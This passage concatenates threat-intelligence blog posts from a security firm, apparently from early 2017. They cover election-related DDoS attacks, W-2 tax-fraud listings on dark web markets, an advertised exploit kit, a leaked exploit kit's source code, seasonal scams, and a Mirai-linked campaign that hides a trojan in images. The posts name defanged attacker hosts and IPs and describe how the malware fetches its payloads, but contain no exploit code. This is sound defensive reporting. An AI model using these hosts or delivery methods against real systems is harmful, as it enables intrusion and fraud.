    Some of the Turkish attacks have coincided with the Dutch election which took place on March 15. We have also seen evidence of retaliation from Dutch-based actors in the form of an attempted doxing of the Turkish actors responsible for the Versio defacements mentioned above, although nothing on the scale of the activity from the Turkish actors has been observed. As the referendum vote scheduled for April 16 approaches, we anticipate further activity from Turk Hack Team as well as other pro-Turkey threat actors.

    Tax Fraud in 2017 Mon, 27 Mar 2017 09:18:56 +0000 The IRS recently released an alert that warned tax professionals and taxpayers to be wary of last minute email scams. With April 18 looming, how concerned should individuals and businesses be by tax fraud?

    On January 31, 2017, a report by Treasury Inspector General for Tax Administration’s “Results of the 2016 Filing Season” was published, demonstrating a reduction in the number of fraudulent tax returns identified between 2013 and 2015. Conversely, at the same time, the IRS reported a “400 percent surge in phishing and malware incidents in the 2016 tax season”, showing that cybercriminals continued tax related fraud activity.  The number of identified fraudulent returns, therefore, was not indicative of the overall levels of tax fraud occurring.

    The tax season represents a potentially lucrative time for cybercriminals. We have detected numerous instances of actors requesting and selling items pertaining to tax fraud across criminal sites: both on the open and dark web.

    Although there is evidence of increased volume of phrases associated with tax fraud and evidence of tax fraud related items for sale on criminal sites, this must be placed into the context of increased user awareness and an expansion of IRS’s efforts to prevent fraudulent tax returns.

    Assessing dark web and criminal chatter

    In order to gauge the interest in tax fraud in 2017, Digital Shadows assessed mentions of keywords detected across known criminal and dark web sites. The frequency of these terms is shown in figures 1 and 2. The number of mentions in 2017 so far is already over 40 percent of the 2016 total.

     Insider Trading Keywords

    Figure 1: Mentions of keywords associated with tax fraud detected by SearchLight across dark web and criminal sites, distributed by year

     Top Keywords Insider Trading

    Figure 2: Mentions of keywords associated with tax fraud detected by SearchLight across dark web and criminal sites, distributed by the most popular phrases per year.


    Items for sale on criminal and dark web sites

    On February 16, 2017, the user ‘innermind’ on requested W2 forms in bulk on the AlphaBay forum. The user requested approximately 500 forms and was willing to pay $4 USD per form.

    Insider Trading Alphabay

    Figure 3: A post on AlphaBay from February 16, 2017

    In another instance, a user named ‘Telepath’ on CrdClub offered, on loan application files from a mortgage lender’s database in California. The database contained tax forms such as W-2 information. The actor clearly references that you can use this for tax returns. He offered each set at $15 USD.

    Insider Trading CrdClub

    Figure 4: A post on CrdClub from September 2016  

    The user ‘mwenish’ on Carding Forum posted advert for “w2 fulls” on an unknown date. He offered each set for $5 USD with a bulk price of $100 USD for 30. The user received one response asking for more information.

    Insider Trading Carding

    Figure 5: A post offering tax refund full details on Carding Forum, Date unknown.

    Figure 4 shows the vendor Medon on Hansa marketplace offering W-2 forms he claims were “fresh from company” on an unknown date. The listing showed 996 forms in stock at a price of $10 USD per item.

    Insider Trading Hansa

    Figure 6:  User selling W-2 forums on Hansa marketplace. Date unknown.  


    The tax season provides added opportunity for cybercriminals and it is no surprise that we have detected illicit items for sale. We have also observed a slight increase in the level of tax fraud terms in 2017. Organizations should be aware that personal information and employee tax forms hold great value for threat actors, with personal information commonly sold on criminal marketplaces.

    However, this should be placed into the context of the IRS’s expansion of its processes to prevent fraudulent tax returns from entering the tax processing system and a greater emphasis on user awareness. In continuing to increase user awareness about phishing campaigns targeting this sort of information, individuals and businesses can better understand the risk posed during tax season. IRS provide some great resources for understanding the latest techniques used by attackers, which you can access here, or by following @irstaxpros on Twitter.

    Dutch Elections – Looking Back at Cyber Activity Tue, 21 Mar 2017 09:49:01 +0000 Last week, I wrote about the potential threats to the Dutch national election. But what actually happened?

    On 14 March 2017, the day before the Dutch General Elections, websites and suffered from DDoS attacks. These websites are popular during the General Elections in the Netherlands, as they give advise to users on which party to vote for by conducting a survey and ‘matching’ the user to the most compatible party. Both StemWijzer and KiesCompas publically announced their service interruptions as they happened. Servers for both sites were rendered offline for a short time in the afternoon, but for a longer period later that evening. During that night, the sites allegedly received help from Google’s Project Shield to get the site back online. While additional servers had been prepared for the domains in anticipation of last minute traffic before the elections on March 15, they could not handle the DDoS attacks.


     [Translation: Our website has unfortunately just been hit by a DDoS-attack. Out priority is to get StemWijzer back online a.s.a.p.]


    [Translation: Kiescompas is offline after multiple DDos attacks. We are working hard to get the site back online.]

    At the time of writing, both sites were online and the attacks had not been claimed by any party. Yet what was the aim of who was behind the attacks in rendering these sites offline?

    Al though the attacks have not been claimed, it is widely speculated the sites were taken offline by actors loyal to the Turkish state. A cybercrime expert at Fox-IT stated that while the sites were not taken down until Tuesday, DDoS attacks had been launched as early as Saturday night. This was around the same time as the Diplomatic conflict between the Dutch and Turkish states started. Cyberattacks have persisted until the day of elections. Considering the consistency of the DDoS attacks against KiesCompas and StemWijzer, there have surprisingly been no reports of successful or attempted cyberattacks against sites of Dutch political parties, or any site of the Dutch government.

    As media speculate about the origin of the attacks against StemWijzer and KiesCompas, the Russian threat has not been put forward once as a possibly culprit. While initially nobody attributed the attacks to any known party, later suggestions have consistently pointed to actors sympathetic with Turkey.

    Zondag met Lubach

     Screenshot from Zondag met Lubach, which aired on 19 March 2017. 

    The Damage

    Though the story of StemWijzer and KiesCompas going offline made headlines everywhere in the Netherlands, the damage appears to have been limited. The sites went offline for a short time during in the 24 hours leading up to the elections, and while some voters were still undecided, other websites remained to give voting advice.

    Official voting results will be announced on 21 March 2017, but most of the announced numbers are unlikely to change. Geert Wilders, perhaps the most famous Dutch politician right now, won significant seats in the House but did not become the majority party. Conversations are currently held among leaders of various parties in the Dutch House of Representatives to create a coalition, jokingly compared to choices to be made on a dating website by comedians. At this stage then, the fear for cyber disruptions is mostly over, but it is the realistic possibility that cyber espionage could be carried out to gain first hand information about the internal struggles of the Dutch political system.

    Five Reasons Why Alex Seton VP of Business and Corporate Development, Joined Digital Shadows Tue, 21 Mar 2017 09:45:41 +0000 What a great feeling to find a company that cuts through today’s noisy and crowded security market to address an area that keeps many folks awake at night. After embarking on a deliberate and meaningful process to better understand and validate the challenges today’s cyber security practitioners face, I came across Digital Shadows.

    Throughout my career, I’ve been fortunate to work with many security practitioners and visionaries; including security analysts, CTOs, CISOs, consultants, and small to large vendors. These folks validated my belief that precise, meaningful data will trump the coolest “next-generation” security tool that only succeeds in triggering yet more meaningless alerts.

    As background, I’ve been in this industry for a decent amount of time. Along the way, I’ve had the opportunity to work for large growth companies, helped to build a contemporary security startup and play my part in its subsequent exit. As part of the journey, and as first time startup executives, we overcame challenges that were typical of early, un-proven companies. During this process, we knew one thing; we wanted to be the best in what we did and to be widely recognized as the leader in product and customer experience. We wanted to bring full fidelity to what was an opaque view of a foe’s activity. And we did it.

    At Digital Shadows, the value proposition and team characteristics are very similar. In fact, I’ve distilled five characteristics:

    1. Completing the story of the security professional. Digital Shadows provides practitioners with the information that was never available to them before.
    2. Unrivalled breadth and depth. The products wide range of sources is uniquely combined with in-depth expertise.
    3. Empowers organizations. The solution doesn’t make more work, but it makes analysts and their tools more effective in the battle.
    4. Led by a team of practitioners. The leaders are practitioners who understand the challenges facing the industry.
    5. The right culture. The team understands the need to do the best thing for all and strives for this.

    Former practitioners in Alastair Paterson and James Chappell – two incredible individuals who really understand the pain that security analysts and CISOs face every day – have built a real gem buried in the sand. They understand that companies have left a “shadow” in their internet footprint and the risk poses by cyber threats, data leakage and reputational damage.

    The team wants to be the best at what they do- for the customer, for their employees, and for the investor community.  As at my previous startup Solera Networks, where we were the first to deliver network context to binary event information seen in perimeter based solutions, Digital Shadows also brings a powerful new set of capabilities to view “outside the firewall” activity that poses a risk to a company’s assets and employees.

    In closing, I’m very excited for our prospects ahead and look forward to what I believe will be another fantastic journey.

    5 Risks Posed By Mobile Applications That SearchLight Helps You Manage Tue, 14 Mar 2017 08:41:45 +0000 Organizations face a wide range of risks online, including cyber threats, data leakage and reputational damage. (You can learn more about digital risk management here). One source of digital risk is mobile application stores, which is why we’re excited to announce that, as of today, Digital Shadows SearchLight™ now monitors for risks posed by mobile applications.

    Mobile applications are great for communicating with your employees and customers, but they come with added risk. SearchLight™ continually monitors across official and unofficial stores for five mobile apps that can pose a risk to your organization:

    1. Your Apps. Issues within your own apps, such as self signed certificates or the presence of malware. This includes external and internal applications.
    2. Modified Apps. Versions of your own apps that have been modified by a third party.
    3. Copied Apps. Copies of your own apps on stores that you are not actively managing then on.
    4. Impersonating Apps. Impersonating or spoof apps that mimic your branding or identity.
    5. Affiliate Links. Affiliate links to your own apps that may mislead or confuse users.

    For each mobile application, SearchLight analyzes the code to assess what threat it poses to your customers and your organization. If these apps go undetected by your organization, the potential impact can include the theft of customer data, diversion of revenue, brand and reputational damage, and poor customer service.

    Mobile application monitoring is not the only thing that’s being released today; we’ve also released an updated user interface. In 2016, Forrester described SearchLight as the “digital risk dashboard of the future”. We’ve taken that dashboard and made it even better (See Figure 1).

    Figure 1: SearchLight’s updated user interface

    Combined with our existing features, SearchLight’s updated user interface and new mobile application monitoring further improve organizations’ ability to understand the risks they face online. With this improved view of their digital risks, organizations can efficiently focus on the highest priority incidents, keeping their security and reputation intact.

    Check out our web page on Digital Risk Management to learn more.

    Back to the red pencil – Cyber threats to the Dutch elections Mon, 13 Mar 2017 08:39:49 +0000 Over the weekend, media reports surfaced about the fears of Russian interference in UK elections, with GCHQ reportedly warning political parties that hackers “steal and leak internal emails or publish private databases of voters’ political views in an attempt to damage the standing of political parties with the public.” A more immediate election takes place on Wednesday March 15, as the Dutch General Election – complete with the controversial Geert Wilders – opens its polling stations. But what are the threats facing this upcoming election?

    There have been real concerns about cyber threats to the Dutch General Elections. According to the 2015 annual report by the Dutch General Intelligence and Security Service (AIVD), Russia, China and Iran have posed significant threats to Dutch security over the past years. According to the security service, part of the cyber espionage has been aimed at obtaining political documents, showing that there has been interest by foreign parties in Dutch affairs. Reports even accuse APT28 and APT29 (Cozy Bear and Fancy Bear), which are suspected Russian state actors, of attempting to compromise Dutch politicians’ emails and social media accounts. These discussions were most prominently featured in the news in January and February of 2017, with only weeks to go to the elections, underlining discussions of how foreign entities might seek to affect the elections.

    Concerns over the Voting Systems

    While the Dutch have been voting with paper and a red pencil for years, the counting of the votes was done electronically. Based on recent reports of cyber threats to elections, Dutch news organization RTL has published an article claiming the systems counting the votes are poorly secured. Data from local stations is transferred to a thumb drive, which are distributed to a local gathering point, from which they are then sent to one central location.

    The Netherlands did briefly consider using voting machines, before swiftly dismissing the idea in 2009 as it would be too easy to hack. It turns out, according to researcher Sijmen Ruwhof, the current system was just as poorly constructed. The hash code to decrypt the files with local election results is publicly available through the instruction video by the Dutch Electoral Council. Furthermore, web browsers are needed to use the vote counting software as well as an unsecured (but local) HTTP connection, which significantly increases the opportunities to exploit vulnerabilities. Ruwhof points to further practices demonstrated in the video for the vote counting software that are generally considered bad practice, such as: skipping security checks, sending hash codes at the same time as the protected file, not removing files after they were printed, and generally poor security hygiene (read the full report here). As a result, the decision was made February 1st that all votes would be counted manually to mitigate any potential for interference.

    Dutch Electoral Council

    Figure 1: A screenshot of a instructional video by the Dutch Electoral Council

    Possible Motivations

    Opinions appear to differ on whether outside forces would want to influence the Dutch elections. Russia is taken as the leading example by Tony van der Togt from the Clingendael Institute in The Hague, arguing that while there have been threats from Russia in the past such as during the MH17 research, the Dutch General Elections might not even be interesting to them. He points out that unlike some other European populists, Wilders has no interest in improving Russian – Dutch relations. On the other hand, co-founder of Fox-IT Ronald Prins, suggests that “the Dutch elections are good practice for [the Russians].” In fact, Prins argued, compromised emails might still be published, as Russia has stolen military government information in the past.

    Motivations are further muddied by nuances in the Dutch political system. Whereas the U.S. election came down to a campaign between two people, the Dutch political system operates slightly differently. Discrediting one individual does not necessarily lead to the election of their rival. This is down to three factors:

    1. The House of Representatives (Tweede Kamer der Staten-Generaal) is operated by a cabinet formed by a coalition. Even if a party wins, they usually have to join with the party coming in second place in order to secure a majority in the House (though a minority coalition is not ruled out).
    2. While each party has their appointed top candidates for the elections (lijsttrekker), this does not guarantee the top candidate of the biggest party will become Prime Minister.
    3. The Netherlands has a number of political parties eligible for seats in the House. During the 2017 elections 28 parties are eligible for one (or more) of the 150 seats. This then means, cyber threats motivated by attempting to influence the election results might not produce significant results due to the complexity and unpredictability of the forming of the coalition.

    Although there are cyber threats to the General Elections, due to the nature of the Dutch system and precautions already taken, these will be more limited in scope than they were to the U.S. presidential elections. Perhaps that’s why Dutch citizens are more concerned with taking various online tests to see which party best matches their ideas, or they are busy trying to keep their digital pet politician alive.

    Learning from the Top Threats Financial Services Faced in 2016 Wed, 08 Mar 2017 18:55:27 +0000 Organizations operating within the financial services industry represent an attractive target for threat actors.

    Here’s three types of threat facing financial services we observed in 2016:

    1. Banking Trojans

    Throughout 2016, we observed the continual evolution of banking Trojans, such as TrickBot, GozNym (Figure 1) and Panda. As banking trojans evolve we will see them adopt increasingly complex techniques, spread to new regions, and incorporate new languages. Early detection of changes to targeting trends can help organization to be better prepared.

    Figure 1 GozNym dark web

    Figure 1: GozNym for sale on a dark web marketplace

    2. Targeted intrusions

    Throughout 2016, a relatively large number of network intrusions targeting the financial services and banking sector were reported, including several major thefts. This includes attacks on the SWIFT interfaces, as well as actions by KS Group and Buhtrap. It’s no surpise we’ve seen a continuation of this activity in 2017, including a campaign against 84 financial services organizations.

    3. Extortion

    The arrests of key members of DD4BC in early 2016 failed to halt the trend in DDoS extortion. Actors such as Armada Collective, Kadyrovtsy and vimproducts were all credible actors in this space. Of course, understanding the veracity of threats is a challenge for organizations.

    Another approach to extortion emerged through ransomware. Barely a week went by without another variant being offered or sold online. Understanding the tactics of these actors – such as delivery methods – can help organizations to better protect themselves. Indeed, spam emails, malicious attachments and exploit kits such as RIG are likely to remain viable delivery methods for ransomware in 2017. A rise in Ransomware-as-a-service models will make it easier for these types of attacks to proliferate. Figure 2, for examples, shows nearly 1,200 sales of a ransomware source code on a dark web marketplace.

    Figure 2 ransomware sourcecode dark web

    Figure 2: Ransomware sourcecode for sale on dark web marketplace

    Aside from DDoS extortion and ransomware, an interesting development to extortion occurred in the case of Valartis Bank in Liechtenstein, where an actor attempted to extort the customers themselves in order to diversify their revenue stream.

    Of course, it’s not all about the financially motivated actors; ideological actors, such as hacktivists, can also offer a real threat.

    Successful attacks can have widespread and damaging impact for organizations and their customers. By understanding the threats and tactics, techniques and procedures (TTPs) that security professionals in the financial services sector, organizations can better manage their digital risk and align security strategies in 2017.

    New “Blaze” exploit kit claims to exploit recent Cisco WebEx vulnerability Thu, 02 Mar 2017 11:08:32 +0000 A previously undetected exploit kit has been offered for sale on the clear web forum HackForums since February 8, 2017 with the name “Blaze Exploit Kit”. It was offered for sale by a user with the nickname “Cat Warrior” (see Figure 1) who has a good reputation on the forum and who had previously operated a service for the purchase of bots called “BotShop”.

    Blaze Advert

    Figure 1 – Initial advertisement for Blaze

    Recent Vulnerabilities

    The advertisement for the Blaze exploit kit claimed it was capable of exploiting a total of 16 vulnerabilities. An examination of the vulnerabilities showed that they related to Internet Explorer, Java, Microsoft Silverlight, Adobe Flash Player and a Cisco WebEx extension vulnerability. Indeed, Blaze’s alleged exploitation of the WebEx vulnerability could represent a shift in targeting from average end users to a more business oriented focus.  The most recent were discovered and patches released for them in 2017. The CVE numbers were included in the advertisement, but it was not confirmed if the exploit kit included exploits for them at the time of writing. See Table 1 for a list of these.

    Blaze Exploits

    Table 1 – List of vulnerabilities for which Blaze claimed exploits

    Rental prices for Blaze were offered in two plans. The first was priced at $300 per week or $1,200 per month, and included the Internet Explorer and Flash Player exploits advertised. The second plan was priced at $600 per week or $2,400 per month, and purported to include Mozilla Firefox exploits, although no evidence of these were detected in the advertised vulnerabilities. Payment was accepted in Bitcoin only. When first advertised, the Blaze exploit kit was purportedly in its first version, but a post on February 10, 2017 by “Cat Warrior” suggested a second version would be released in the near future. Furthermore, the user “Cat Warrior” claimed further updates would include a domain rotator and a steganography feature. Feedback for the Blaze exploit kit was predominantly positive at the time of writing, with at least four users claiming it functioned as advertised. While there was skepticism expressed by two reputable users on the forum, they did not provide any evidence to suggest the offering was not credible.

    The Outlook

    Due to the positive reputation and previous service that the user “Cat Warrior” has operated in the past, it is possible that this new exploit kit is legitimate. While other reputable users did have doubts as to the legitimacy of the new kit, no evidence was provided to suggest otherwise. All of the vulnerabilities, when exploited, could allow for remote code execution (RCE) to take place.

    An incoming exploit kit with promises of current (2017) vulnerability exploitation capabilities would benefit from the currently unsaturated exploit kit market. Since June and July of 2016, the exploit kit marketplace saw a large drop in terms of kit numbers, with many other kits (e.g. Nuclear and Angler) becoming outdated and abandoned. The source code for the popular Sundown exploit kit was leaked online, which could signal its demise soon, or at least see a surge of similar kits come onto the landscape. If this new exploit kit is legitimate, it could become successful as it distinguishes itself by using current vulnerabilities and promises upcoming updates.

    However, the success and market share of the kit remains to be seen. As with any cybercriminal offering, and technology businesses in general, the continued success and uptake by customers will rely heavily on the reputation that it acquires through its functionality, regular updates, customer service and effectiveness. What differentiates Blaze from many other exploit kits is the relative openness of the advertising. Previously highly successful exploit kits, such as Angler, had a very low public profile. This may be a double-edged sword for Blaze; while open advertising may mean a large customer base, it may also attract the attention of the public and, potentially, law-enforcement, an obvious risk to its continued operation.

    Step by Step: The Changing Face of Threat Led Penetration Testing Tue, 28 Feb 2017 11:33:00 +0000 Organizations are increasingly adopting the threat led approach to penetration testing. This approach essentially advances the boundaries of conventional penetration testing by seeking to adopt the tactics, techniques and procedures of an advanced threat actor aggressively targeting a critical system.

    The Bank of England-backed CBEST scheme and CREST-accredited STAR scheme are the two man programs to have emerged that have adopted threat led penetration testing. The first wave of CBEST tests has already occurred; with the Bank of England having urged the UK’s systematically important financial institutions to take the test.

    A STAR test is similar to a CBEST test in many ways, but different in that it has no input from the regulator. However, it’s no longer just the United Kingdom; Hong Kong and the Netherlands are developing their own schemes that aggressively test critical systems in a live environment. Even if there is no requirement to conduct threat lead penetration testing, the approach can benefit organizations across the globe who are interested in conducting more effective assessments of their security posture.

    Although such schemes are in their infancy, I’ve noticed a rapid development, particularly within the STAR scheme – the change from a linear to iterative process.

    The STAR Test

    A basic breakdown of the project steps for both a CBEST and STAR test is shown below:

    Provider Project Phase
    Threat Intelligence (TI) Define number of Critical Functions (CFs) in scope
    Construct targeting report based on open source research around the CFs
    Develop Threat Actor profiles specific to the CFs and based on the results of the targeting report
    Develop scenarios, with approximately one scenario per CF
    Deliver Threat Intelligence report
    Penetration Tester (PEN) Conduct penetration test based on results of the Threat Intelligence Phase of the project

    The table above demonstrates two main factors:

    1. There are two distinct providers involved in a CBEST/STAR test; the Threat Intelligence and the Penetration Tester.
    2. The process flows lineally from start to finish.

    But this is starting to change. The linear flow is beginning to be replaced with a more iterative cycle that involves far greater dialog between the threat intelligence and penetration test provider. This not only results in a more cohesive project for the client, but it also demonstrates a profound change to threat led penetration testing. This is highlighted through the presentation of the attack scenarios.

    Linear versus Iterative Process

    Within the conventional, linear threat led penetration test, the scenarios are presented to the client as threat scenarios that could possibly work against a Critical Function (see below for stages 1-6). This is based on the previous reconnaissance and estimation of the capabilities of the threat actor. However, it is common for a scenario to quickly become unworkable early in the penetration test stage due to some unseen control within the client environment. Often, only 1 out of 5 scenarios become viable.

    1. Define number of Critical Functions (CFs) in scope
    2. Construct targeting report based on open source research around the CFs
    3. Develop Threat Actor profiles specific to the CFs and based on the results of the targeting report
    4. Develop scenarios, with approximately one scenario per CF
    5. Deliver Threat Intelligence report
    6. Conduct penetration test based on results of the Threat Intelligence Phase of the project

    Within more iterative model of a threat led penetration test, the threat intelligence provider initially delivers a far more slimmed down scenario that really just designates the ultimate effect on the Critical Function as opposed to a blow-by-blow road map for the penetration tester to work through. The scenarios are subsequently updated as the penetration tester discovers nuances within the client network.

    This is the fundamental difference between the linear and iterative approach to threat led penetration testing. In a sequential test the scenarios are either achievable or not. In an iterative style test, on the other hand, all of the scenarios should be achievable by the end of the test.

    The Benefits of an Iterative Process

    With so many scenarios now viable, organizations will, understandably, seek security assurances. To allay these concerns, I suggest the development of an additional framework to examine factors around the actor featured within the scenario. Factors might include:

    • Motivation
    • Level of resourcing
    • Technical skill
    • Access to advanced tools

    These factors could all be used to effectively ‘benchmark’ a scenario. The penetration testers would begin at the lowest level, but increase each factor over time.

    The Outcome

    The completion of this iterative approach will result in a test that will reassure the organization that their system is secure against a constellation of actors with a defined set of skills and resources. Organizations can then better prioritize security spending and allocate resources as appropriate.

    Sun to Set on BEPS/Sundown Exploit Kit? Wed, 22 Feb 2017 16:53:27 +0000 On February 13, 2017, the security researcher David Montenegro (@CryptoInsane) posted a series of tweets claiming that the source code for the BEPS exploit kit had been leaked online. Montenegro’s posts were accompanied by screenshots which showed a log file purportedly taken from the dump, which featured references to the actor “Kriminalac” and the Yugoslavian Business Network (YBN).

    BEPS and the Sundown exploit kit are commonly referred to interchangeably and we have previously assessed that these two kits are likely the same. This leak was also acknowledged by the user @666_KingCobra, who has previously claimed to be the creator and operator of the Terror exploit kit, an exploit kit that closely imitated Sundown.

    What was leaked?

    @666_KingCobra claims the leak includes exploit kit source code, control panel data, and exploit code for a number of vulnerabilities. This user also claimed that the kit was, at the time of posting, hosted on 188[.]209[.]49[.]98. In addition to these claims, on February 11, 2017 a thread was created on the criminal forum Hack Forums claiming that the source code for the BEPS exploit kit had been leaked and warning other users to treat offers of paid access to exploit kits with caution. Again on February 11, 2017, a listing on the dark web criminal marketplace AlphaBay offering the code for sale was also detected (shown in Figure 1). Based on the identification of three independent sources who all made consistent claims, it was assessed to be probable that the genuine BEPS source code has indeed been made publicly available online.

    BEPS alphabay

    Figure 1 – AlphaBay listing for the BEPS source code and exploits.

    Nobody said it was easy

    Towards the end of 2016, it was clear that threat actors were drawn to using the Mirai botnet source code – but required technical help to actually make use of it (See Motherboard’s “Wannabe Hackers Are Willing to Pay To Learn How To Use the Mirai Botnet”). Following the release of the BEPS (Sundown) exploit kit source code, a similar phenomenon is occurring.

    It is probable that the majority of actors who attempt to use this source code will not be successful in their attempts to operationalize the exploit kit. Examinations of other exploit kit operations has indicated that significant logistical support is required for success, as threat actors must obtain a continuous flow of victim traffic to landing pages, as well as a supply of domains to actually host landing pages. Kit operators must also develop or obtain exploit code in order to improve their exploit kit’s capability if they wish  to remain competitive in the marketplace.

    These challenges are likely to represent significant obstacles for threat actors who do not already have access to the resources and access necessary to secure this logistical support.

    Looking Forward

    This development was also considered likely to have a significant impact on the operators of the BEPS/Sundown exploit kit, as it will likely both impact user trust in this criminal service and force the kit’s operators to invest time and resources into development new exploit and updating their source code.

    The availability of the BEPS/Sundown source code is likely to have a significant impact on the exploit kits operators. It will likely impact both user trust in this criminal service and force the operators to invest time differentiating their source code and developing new exploits.

    This will likely have the effect, at least in the short term, of further contracting the exploit kit landscape, which shrank significantly in 2016 as a result of the disappearance of Angler and Neutrino. Other than Sundown, only the RIG exploit kit and Magnitude have remained significantly active into 2017. At the time of writing the vast majority of exploit kit traffic was linked with various version of RIG, indicating that this kit will likely continue to dominate the exploit kit space in the future, barring a disruption to its operations.

    Four Things to Look Out for This Valentine’s Day Tue, 14 Feb 2017 17:44:50 +0000 Consumers are increasingly moving to the Internet for their holiday purchases—and Valentine’s Day is no exception. According to the National Retail Federation, in 2017, almost 30% of consumers planned to shop online, which is double the response from 2010 (16.3%).

    The prevalence and convenience of online shopping is not only enticing to consumers searching for the best deal on bouquets. Threat actors celebrate Valentine’s Day too—yet they are not hoping for flowers or chocolate. It is typical for actors to escalate cyber attacks during seasonal events when individual victims are often unwary and most vulnerable. These attacks target both individual users and online vendors, exploiting known vulnerabilities to gain access to personal information or extort money from victims.

    Your heart may be vulnerable this Valentine’s Day, but your online presence should not be. Here are four ‘gifts’ you should look out for Valentine’s Day:

    1. Not-So-True Love

    How do you know when it is true love? Chances are, if your digital ‘loved one’ asks for money—they are not real. Romance scams have become increasingly more common, with the UK’s National Fraud Intelligence Bureau reporting over 3,800 victims in 2016 alone. These scams often take place via dating websites and apps. Heartless scammers take advantage of people looking for romantic partners by gaining their affection and using that emotional vulnerability to extort money, often in large sums.

    2. Ransom Notes

    Rather than love notes, in 2016, over 30 florists received ransom notes demanding payment in exchange for the cessation of targeted denial-of-service campaigns against their websites.  There is no doubt that being offline during one of the busiest seasons of the year can lead to huge losses in revenue for florists and other e-tailers. Under pressure, these ransom demands are more likely to be met—something criminal actors are counting on. With the release of the Mirai botnet source code online, it is likely that we will see more and more high-volume denial of service attacks against retailers.

    Other actors have targeted unauthenticated MongoDB installations and replaced their contents with a ransom note and payment instructions. This new extortion method was first observed on December 20, 2016 and continues to affect open MongoDB installations at time of writing.

    3. Malicious Advertisements

    Attackers can use web and mobile advertisements as a means of distributing malware by luring victims with one-time offers and bargain prices. These advertisements usually involve an attacker injecting malicious code into a legitimate advert which will either download malware directly onto a victim’s machine or redirect visitors to a website that then distributes malware. Online dating sites have previously carried such advertisements. In 2015, dating sites PlentyofFish and both delivered fake ads to their users, leading Match to briefly suspend adverts on their UK website.

    4. Phishing emails and pages

    Phishing emails are not always as easy to spot as the ones with the subject lines advertising singles in your area. Attackers will try to trick users through fake emails and websites that at first glance, look legitimate. These sites can be used to steal victims’ credentials or to distribute malware.

    Researchers identified a convincing phishing campaign that combines social engineering and technical attacks to target Gmail users. The malicious email, which originates from a compromised account of a known contact is tailored to contain a subject line and an image relevant to both the recipient and the sender. However, when the image is clicked, a new tab opens prompting the user to re-enter their credentials. Once compromised, attackers used the victim’s own contact lists and used them to conduct further attacks.

    Organizations and individuals ought to be aware of these four tactics used by adversaries and take steps to protect their data, infrastructure, employees and customers.

    An unusually Swift(tay) malware delivery tactic Thu, 09 Feb 2017 18:28:52 +0000 While doing some background research into recent reporting by Dr Web on a newly identified version of Mirai, we made an interesting discovery. VirusTotal behavioural analyses for the Windows Mirai hashes provided by Dr Web indicated that each sample used HTTP GET requests to download text files from three subdomains on what appeared to be a threat actor controlled site (f4321y[.]com). Each sample also used HTTP GET requests to request the infected hosts IP from pubyun[.]com and, significantly, to download an image file from a Chinese social media site. Interest piqued, we took a look at the file and discovered that it was an image of Taylor Swift carrying an embedded portable executable (PE) file. Examination of the PE indicated that it was a malicious executable named WPD.exe, which was found to be classified as a remote access trojan (RAT).

    Windows Mirai Taylor

    Figure 1 – Image downloaded by Windows Mirai malware samples.

    We decided to dig a little further and examine the passive DNS data for the C2 domain identified by Dr Web. This indicated that it was hosted on and IP address which also hosts another domain (mykings[.]pw) with three subdomains named identically to those on the Windows Mirai C2 domain. Further examination turned up 25 further malware samples which were found to behave very similarly to those identified by Dr Web. All sent HTTP GET request to request host IPs from pubyun[.]com and to download text files from subdomains of mykings[.]pw. Several of these samples were also found to be sending DNS requests to f4321y[.]com. In addition to these behaviors, many of these samples also pulled identical images of Taylor Swift carrying a second malicious PE file from another Chinese social media site. The chart below provides a graphical representation of these connections.

    Mirai C2 Link Analysis

    Figure 2 – Link chart of entities involved in malware delivery campaign.

    Based on the information we’ve been able to assemble, it appeared likely that whoever was responsible for the Windows Mirai operation identified by Dr Web has also been using linked infrastructure (and pictures of Taylor Swift) to distribute and operate a RAT and at least 25 other malware samples. The scale of this distribution operation was not known at the time of writing, but compilation and signature signing timestamps on many of the malicious files indicated that many of the malicious executables identified were created in February 2017, suggesting that at the time of writing, this element of the distribution operation was relatively recent. It remains to be seen whether any further information on this campaign will Swiftly emerge.

    IOC appendix

    Windows Mirai samples identified by Dr Web





    Image files



    PE files









    C2 infrastructure




    Malware linked to identified C2


























    F3EAD: Find, Fix, Finish, Exploit, Analyze and Disseminate – The Alternative Intelligence Cycle Wed, 08 Feb 2017 19:57:00 +0000 The F3EAD cycle (Find, Fix Finish, Exploit, Analyze and Disseminate) is an alternative intelligence cycle commonly used within Western militaries within the context of operations that typically result in lethal action, such as drone strikes and special forces operations. A basic summary of the phases of the cycle is as follows:

    1. Find: essentially ‘picking up the scent’ of the opponent, with the classic “Who, What, When, Where, Why” questions being used within this phase to identify a candidate target
    2. Fix: verification of the target(s) identified within the previous phase, which typically involves multiple triangulation points. This phase effectively transforms the intelligence gained within the “Find” phase into evidence that can be used as basis for action within the next stage
    3. Finish: based on the evidence generated from the previous two phases the commander of the operation imposed their will on the target
    4. Exploit: deconstruction of the evidence generated from the finish phase
    5. Analyze: fusing the exploited evidence with the wider intelligence picture
    6. Dissemination: finally publishing the results of the research to key stakeholders

    Looking at the above cycle from an information security perspective, it becomes obvious that this cycle can be applied within the cyber security context. This statement is borne out by making small changes to the above narrative i.e. replace “Kill or capture” with “remove or restrict.” Many security teams do the practice of “find-remove-on to the next” and, while that is at the core of the F3EAD cycle, there is still value in defining the process within the confines of the framework.

    Some may ask, “is F3EAD merely reinventing the wheel of the intelligence cycle?” I would argue ‘no’ and that F3EAD is far more tactical in practice than the more strategic intelligence cycle and it’s less defined boundaries of Direction, Collection, Analysis and Dissemination.

    What the existence and simulations of both these intelligence frameworks cycles show is that intelligence as a professional practice spans a number of levels within the organization, from the high-level strategic decision making that the intelligence cycle caters to, down to the tactical, ‘minute by minute’ style of operation that the F3EAD cycle supports. Within this context, both cycles could be implemented within an organization. Shown below is a simple example of a hypothetical organization using both cycles to combat an Advanced Persistent Threat group, the intention of this is to show how the cycle interlink and provide mutual support to each other and some of the key stakeholders invested in both.

    The Intelligence Cycle

    Phase Action
    Direction Board level identification of APT groups as the core cyber security threat to the business
    Collection The company’s threat intelligence team collects data gathered from internal response cases and fuses it with data provided by the external threat intelligence provider.
    Analysis A full fusion and analysis of collected data over a strategic period of time (6 months to 1 year)
    Dissemination Results communicated back to the board and the wider threat intelligence community around the specific APT threat that has targeted the company




    Find Suspect activity identified on a number of hosts
    Fix Multiple common indicators of suspicious activity identify a cluster of infected hosts
    Finish Hosts are taken offline and employees are given new machines
    Exploit Based on analysis of malware found within the infected hosts a number of specific Indicators of Compromise (IOCs) are identified by the team
    Analyse Fusing the IOCs found ‘in house’ with the IOCs provided by the third part intelligence provider feeds into the wider picture of the APT threat and leads to further identification of anomalous behavior on the company’s network
